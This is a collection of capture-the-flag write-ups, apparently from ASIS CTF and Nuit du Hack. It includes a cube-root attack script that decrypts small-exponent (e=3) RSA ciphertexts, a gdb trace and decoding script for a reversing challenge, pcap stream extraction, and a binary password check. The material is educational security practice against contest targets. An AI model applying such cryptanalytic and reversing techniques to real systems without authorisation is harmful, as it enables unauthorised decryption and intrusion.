| Welcome to the S3cure OTP Generator |
|————————————-|
| Guess the OTP and get the nice flag!|
| Options:
    [F]irst encrypted OTP
    [S]econd encrypted OTP
    [G]uess the OTP
    [P]ublic key
    [E]ncryption function
    [Q]uit
F
13424849164527521403756445050870196571038349263738328860728317613249912394547060932323343839684520029298203039106900245311207700034998334716959146479549063889540706152154598347254408345543188674922713000891547296629021076472870040539376739314713832772692506639957575066582478623205952405554199517614557654950955573511290458637377044071644643695182159213250790297373664287783665077558548590013992923904092081201939570770508246233526911821723989693584742610070212351991512679896373811561604036362799977744239761678600524058050872970272966843600157676880214915454293
S
13424849164527521403756445050870196571038349263738328860728317613249912394547060932323343839684520029298203039106900245311207700034998334716959144596327888987483332490055908508853395279660155002644916321473620423782059398196874803570889888021013555969780441819173091267534124741585823823928977022296472573786767119234652517576883082612632421073030618602126508756749230654589167402408793504098055206952441309746437159943776038201471785917248460328942218634398236191051477075764560901206858572045306618762342065512902611924464286185405382441808373146820149030892864
P
the public key is:
—–BEGIN PUBLIC KEY—–
MIIBIDANBgkqhkiG9w0BAQEFAAOCAQ0AMIIBCAKCAQEA78LIZcHia4rGA4veXGvi
BaSzN+Vtx1yChcXVBL3EGgY93KRn4JxAC01V5Nzbo7E0U4OreV35m4jJH2o/xYp3
kXqjFqssJ/PCHTWFXEA+wcP7rVO6zl4xsSknjCM/Zp3k97SjaORtFA5U/skHCasQ
6QmsBYvLr/5JIJgScxeUymPT9NKpVmEBmRJvJHf9rEEx6tz/g2LFEK7EFmIi4dwv
YslK70uyl6HHz6AwZqxDrOxy4Y5cJNTj0o1AA8pVXNGmf3KqF4hb5H0hkvareQUy
4GSqnmqdwuEIiOtvz1ts9jqxqeF0OVvBq1iqO+05PU+IqJymnwUbe6lBoAaryV21
/QIBAw==
—–END PUBLIC KEY—–
At first, Encrypt Function is as below. I recognize that e is very small value (e=3) enough to decrypt cipher text to root it.
def gen_otps():
    template_phrase = ‘Welcome, dear customer, the secret passphrase for today is: ‘
    OTP_1 = template_phrase + gen_passphrase(18)
    OTP_2 = template_phrase + gen_passphrase(18)
    otp_1 = bytes_to_long(OTP_1)
    otp_2 = bytes_to_long(OTP_2)
    nbit, e = 2048, 3
    privkey = RSA.generate(nbit, e = e)
    pubkey  = privkey.publickey().exportKey()
    n = getattr(privkey.key, ‘n’)
    r = otp_2 – otp_1
    if r < 0:
        r = -r
    IMP = n – r**(e**2)
    if IMP > 0:
        c_1 = pow(otp_1, e, n)
        c_2 = pow(otp_2, e, n)
    return pubkey, OTP_1[-18:], OTP_2[-18:], c_1, c_2
So I try to make script to do cube root cipher text.
import sys
import gmpy
def root_e(c, e, n):
bound = gmpy.root(n, e)[0]
m = gmpy.root(c, e)[0]
return m, bound
if __name__ == ‘__main__’:
n = 0x00efc2c865c1e26b8ac6038bde5c6be205a4b337e56dc75c8285c5d504bdc41a063ddca467e09c400b4d55e4dcdba3b1345383ab795df99b88c91f6a3fc58a77917aa316ab2c27f3c21d35855c403ec1c3fbad53bace5e31b129278c233f669de4f7b4a368e46d140e54fec90709ab10e909ac058bcbaffe49209812731794ca63d3f4d2a956610199126f2477fdac4131eadcff8362c510aec4166222e1dc2f62c94aef4bb297a1c7cfa03066ac43acec72e18e5c24d4e3d28d4003ca555cd1a67f72aa17885be47d2192f6ab790532e064aa9e6a9dc2e10888eb6fcf5b6cf63ab1a9e174395bc1ab58aa3bed393d4f88a89ca69f051b7ba941a006abc95db5fd
e = 3
enc1 = 13424849164527521403756445050870196571038349263738328860728317613249912394547060932323343839684520029298203039106900245311207700034998334716959146479549063889540706152154598347254408345543188674922713000891547296629021076472870040539376739314713832772692506639957575066582478623205952405554199517614557654950955573511290458637377044071644643695182159213250790297373664287783665077558548590013992923904092081201939570770508246233526911821723989693584742610070212351991512679896373811561604036362799977744239761678600524058050872970272966843600157676880214915454293
enc2 = 13424849164527521403756445050870196571038349263738328860728317613249912394547060932323343839684520029298203039106900245311207700034998334716959144596327888987483332490055908508853395279660155002644916321473620423782059398196874803570889888021013555969780441819173091267534124741585823823928977022296472573786767119234652517576883082612632421073030618602126508756749230654589167402408793504098055206952441309746437159943776038201471785917248460328942218634398236191051477075764560901206858572045306618762342065512902611924464286185405382441808373146820149030892864
m, bound = root_e(enc1, e, n)
print “%d (possible solution under %d)” % (m, bound)
print hex(m)
m, bound = root_e(enc2, e, n)
print “%s (possible solution under %s)” % (hex(m), hex(bound))
print hex(m)
I get public key as below way.
$ openssl rsa -in pub.pem -text -pubin
Public-Key: (2048 bit)
Modulus:
    00:ef:c2:c8:65:c1:e2:6b:8a:c6:03:8b:de:5c:6b:
    e2:05:a4:b3:37:e5:6d:c7:5c:82:85:c5:d5:04:bd:
    c4:1a:06:3d:dc:a4:67:e0:9c:40:0b:4d:55:e4:dc:
    db:a3:b1:34:53:83:ab:79:5d:f9:9b:88:c9:1f:6a:
    3f:c5:8a:77:91:7a:a3:16:ab:2c:27:f3:c2:1d:35:
    85:5c:40:3e:c1:c3:fb:ad:53:ba:ce:5e:31:b1:29:
    27:8c:23:3f:66:9d:e4:f7:b4:a3:68:e4:6d:14:0e:
    54:fe:c9:07:09:ab:10:e9:09:ac:05:8b:cb:af:fe:
    49:20:98:12:73:17:94:ca:63:d3:f4:d2:a9:56:61:
    01:99:12:6f:24:77:fd:ac:41:31:ea:dc:ff:83:62:
    c5:10:ae:c4:16:62:22:e1:dc:2f:62:c9:4a:ef:4b:
    b2:97:a1:c7:cf:a0:30:66:ac:43:ac:ec:72:e1:8e:
    5c:24:d4:e3:d2:8d:40:03:ca:55:5c:d1:a6:7f:72:
    aa:17:88:5b:e4:7d:21:92:f6:ab:79:05:32:e0:64:
    aa:9e:6a:9d:c2:e1:08:88:eb:6f:cf:5b:6c:f6:3a:
    b1:a9:e1:74:39:5b:c1:ab:58:aa:3b:ed:39:3d:4f:
    88:a8:9c:a6:9f:05:1b:7b:a9:41:a0:06:ab:c9:5d:
    b5:fd
Exponent: 3 (0x3)
writing RSA key
—–BEGIN PUBLIC KEY—–
MIIBIDANBgkqhkiG9w0BAQEFAAOCAQ0AMIIBCAKCAQEA78LIZcHia4rGA4veXGvi
BaSzN+Vtx1yChcXVBL3EGgY93KRn4JxAC01V5Nzbo7E0U4OreV35m4jJH2o/xYp3
kXqjFqssJ/PCHTWFXEA+wcP7rVO6zl4xsSknjCM/Zp3k97SjaORtFA5U/skHCasQ
6QmsBYvLr/5JIJgScxeUymPT9NKpVmEBmRJvJHf9rEEx6tz/g2LFEK7EFmIi4dwv
YslK70uyl6HHz6AwZqxDrOxy4Y5cJNTj0o1AA8pVXNGmf3KqF4hb5H0hkvareQUy
4GSqnmqdwuEIiOtvz1ts9jqxqeF0OVvBq1iqO+05PU+IqJymnwUbe6lBoAaryV21
/QIBAw==
—–END PUBLIC KEY—–
$ python solve_otp.py
237667503860111710965249653350625517263440306798910137876859435749199905356736154796944115797449476461699808094618740739874497850440521756435958303032367961
40535050836466712688135359265357 (possible solution under 31164236177314283628208254336126607000897573704651962729479153080499433841714954634001811713695031
247441658525447514248227685519410093562869317175884995069327255163393409948737015989839999322052569596253947)
0x57656c636f6d652c206465617220637573746f6d65722c2074686520736563726574207061737370687261736520666f7220746f6461792069733a2051333944666f644231704743586c48417a
4d
0x57656c636f6d652c206465617220637573746f6d65722c2074686520736563726574207061737370687261736520666f7220746f6461792069733a2044715674766c716f5345556c7675396763
34 (possible solution under 0x6365fde8b4e5593eb05fd19f76893f527a9a5a8fc8b7bf8b2edf613423c94fdd6bc03d7a5807599fb024011ba5e2cd808ae4cbc622d19a47be94bb4bea3cdd
08a8b7f38c523f1a30de1f908e81d6e1060bcbc6556fb)
0x57656c636f6d652c206465617220637573746f6d65722c2074686520736563726574207061737370687261736520666f7220746f6461792069733a2044715674766c716f5345556c7675396763
34
Ascii-decode output and get the flag.
G
Send me the otp 🙂
Q39DfodB1pGCXlHAzM
Woow, you got the flag 🙂 ASIS{0f4ae19fefbb44b37f9012b561698d19}

Wandere bits

At first, I analyze given file by IDA-Pro. Then I realize that this file compare encoded user input and  “828183888a898b848685878c8e8d8fa0a2a1a3a8aaa9aba4a6a583”
But I don’t know how to encode user input.
Then I try to know how to encode, and I compare user input and output.
When I input “ABCDEFGHIJKLMNOPQRSTUVWXYZA ” -> “828183888a898b848685878c8e8d8fa0a2a1a3a8aaa9aba4a6a58
After some try, I realize that a character decide 2-character code such as “A” is “82”, but last character is particular value “+1”.
gdb-peda$ start ABCDEFGHIJKLMNOPQRSTUVWXYZA
warning: the debug information found in “/lib64/ld-2.23.so” does not match “/lib64/ld-linux-x86-64.so.2” (CRC mismatch).
[———————————-registers———————————–]
RAX: 0x400fb0 (<main>:    push   rbx)
RBX: 0x0
RCX: 0xe0
RDX: 0x7fffffffd8e0 –> 0x7fffffffdda5 (“LC_PAPER=en_US.UTF-8”)
RSI: 0x7fffffffd8c8 –> 0x7fffffffdd2f (“/mnt/hgfs/VM-Share/20170408_ASISCTF/Wandere_bits_7f6b94729b459d692265f3e51128ced40065ed52”)
RDI: 0x2
RBP: 0x406940 (<__libc_csu_init>:    push   r15)
RSP: 0x7fffffffd7e8 –> 0x7ffff7496830 (<__libc_start_main+240>:    mov    edi,eax)
RIP: 0x400fb0 (<main>:    push   rbx)
R8 : 0x7ffff7dd4ac0 –> 0x7ffff7dcf838 –> 0x7ffff7b76f60 (<_ZNSt7num_getIwSt19istreambuf_iteratorIwSt11char_traitsIwEEED2Ev>:    )
R9 : 0x7ffff7dc9780 –> 0x7ffff7dc8918 –> 0x7ffff7ae0d40 (<_ZN10__cxxabiv117__class_type_infoD2Ev>:    mov    rax,QWORD PTR [rip+0x2efc81]        # 0x7ffff7dd09c8)
R10: 0x32f
R11: 0x7ffff74b0280 (<__GI___cxa_atexit>:    push   r12)
R12: 0x4011d0 (<_start>:    xor    ebp,ebp)
R13: 0x7fffffffd8c0 –> 0x2
R14: 0x0
R15: 0x0
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[————————————-code————————————-]
   0x400faa:    add    BYTE PTR [rax],al
   0x400fac:    add    BYTE PTR [rax],al
   0x400fae:    add    BYTE PTR [rax],al
=> 0x400fb0 <main>:    push   rbx
   0x400fb1 <main+1>:    add    rsp,0xffffffffffffff80
   0x400fb5 <main+5>:    mov    rax,QWORD PTR fs:0x28
   0x400fbe <main+14>:    mov    QWORD PTR [rsp+0x78],rax
   0x400fc3 <main+19>:    xor    eax,eax
[————————————stack————————————-]
0000| 0x7fffffffd7e8 –> 0x7ffff7496830 (<__libc_start_main+240>:    mov    edi,eax)
0008| 0x7fffffffd7f0 –> 0x0
0016| 0x7fffffffd7f8 –> 0x7fffffffd8c8 –> 0x7fffffffdd2f (“/mnt/hgfs/VM-Share/20170408_ASISCTF/Wandere_bits_7f6b94729b459d692265f3e51128ced40065ed52”)
0024| 0x7fffffffd800 –> 0x2ffffd8e0
0032| 0x7fffffffd808 –> 0x400fb0 (<main>:    push   rbx)
0040| 0x7fffffffd810 –> 0x0
0048| 0x7fffffffd818 –> 0x4a94056c35949fdb
0056| 0x7fffffffd820 –> 0x4011d0 (<_start>:    xor    ebp,ebp)
[——————————————————————————]
Legend: code, data, rodata, value
Temporary breakpoint 13, 0x0000000000400fb0 in main ()
gdb-peda$ C
Continuing.
[———————————-registers———————————–]
RAX: 0x7fffffffd760 –> 0x61c5a0 (“828183888a898b848685878c8e8d8fa0a2a1a3a8aaa9aba4a6a583“)
RBX: 0x0
RCX: 0x0
RDX: 0x0
RSI: 0x0
RDI: 0x7ffff7839b20 –> 0x100000000
RBP: 0x406940 (<__libc_csu_init>:    push   r15)
RSP: 0x7fffffffd760 –> 0x61c5a0 (“828183888a898b848685878c8e8d8fa0a2a1a3a8aaa9aba4a6a583”)
RIP: 0x401098 (<main+232>:    mov    esi,0x4069f8)
R8 : 0x61c4b0 –> 0x61c4f0 –> 0xb0
R9 : 0x1
R10: 0x7ffff7839b78 –> 0x61d2c0 –> 0x0
R11: 0x7ffff7839b78 –> 0x61d2c0 –> 0x0
R12: 0x4011d0 (<_start>:    xor    ebp,ebp)
R13: 0x7fffffffd8c0 –> 0x2
R14: 0x0
R15: 0x0
EFLAGS: 0x206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
[————————————-code————————————-]
   0x40108c <main+220>:    mov    rdi,rsp
   0x40108f <main+223>:    mov    DWORD PTR [rsp+0x70],eax
   0x401093 <main+227>:    call   0x401390 <_Z6wapintB5cxx119BigNumber>
=> 0x401098 <main+232>:    mov    esi,0x4069f8
   0x40109d <main+237>:    mov    rdi,rsp
   0x4010a0 <main+240>:    call   0x400f10 <_ZNKSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEE7compareEPKc@plt>
   0x4010a5 <main+245>:    mov    rdi,QWORD PTR [rsp]
   0x4010a9 <main+249>:    mov    ebx,eax
[————————————stack————————————-]
0000| 0x7fffffffd760 –> 0x61c5a0 (“828183888a898b848685878c8e8d8fa0a2a1a3a8aaa9aba4a6a583”)
0008| 0x7fffffffd768 –> 0x36 (‘6’)
0016| 0x7fffffffd770 –> 0x36 (‘6’)
0024| 0x7fffffffd778 –> 0x400eb0 (<_ZNSt8ios_base4InitD1Ev@plt>:    jmp    QWORD PTR [rip+0x2071aa]        # 0x608060)
0032| 0x7fffffffd780 –> 0x61cac0 (‘0’ <repeats 200 times>…)
0040| 0x7fffffffd788 –> 0x800
0048| 0x7fffffffd790 –> 0x800
0056| 0x7fffffffd798 –> 0x3
[——————————————————————————]
Legend: code, data, rodata, value
Breakpoint 1, 0x0000000000401098 in main ()
So I solve this by coding below scrypt
<code>
”’
abcdefghijklmnopqrstuvwxyz
929193989a999b949695979c9e9d9fb0b2b1b3b8bab9bbb4b6b5
ABCDEFGHIJKLMNOPQRSTUVWXYZ
828183888a898b848685878c8e8d8fa0a2a1a3a8aaa9aba4a6a5
0123456789{}+_-a
30323133383a393b3436b7be17af1e
”’
str = “abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789{}+_-“
code = “929193989a999b949695979c9e9d9fb0b2b1b3b8bab9bbb4b6b5828183888a898b848685878c8e8d8fa0a2a1a3a8aaa9aba4a6a530323133383a393b3436b7be17af1e”
def make_code_list(str):
list = []
count = 0
tmp =””
for i in str:
     tmp += i
     if(count%2 ==1):
          list.append(tmp)
          tmp = “”
     count +=1
return list
str_list = list(str)
print str_list
code_list = make_code_list(code)
enc_list = make_code_list(“82a386a3b7983198313b363293399232349892369a98323692989a313493913036929a303abe”)
print enc_list
flag = “”
for i in enc_list:
     flag += str[code_list.index(i)]
print flag
</code>

Piper TV

Open given file by wireshark. and I can see many long packet (more than 1500 byte).
I realize that this may be movie file because its title is piper “TV”.
So I extract file by wireshark Analyze->Follow->TCP Stream.
Then select Show and Save data to Raw, and Save it.
Input saved data to file command, and recognize that this data is MPEG Data.
So change this file’s extention to .ts and open it by VLC
$ file PiperTV.bin
PiperTV.bin: MPEG transport stream data
Finally I find flag in the movie.

Nuit_du_Hack Writeup

Matriochka Step1

At first I am given 1 file, and survey it by IDAPro. I understand this execute file do as below.

  1. reverse user input
  2. compare above output and “Tr4laLa!!!”

 

So I input as below. Flag is “!!!aLal4rT “
$ ./step1.bin \!\!\!aLal4rT

 

Then large output is displayed in stderr. so those output is saved in step2.bin.

$ ./step1.bin \!\!\!aLal4rT 2>flag2.bin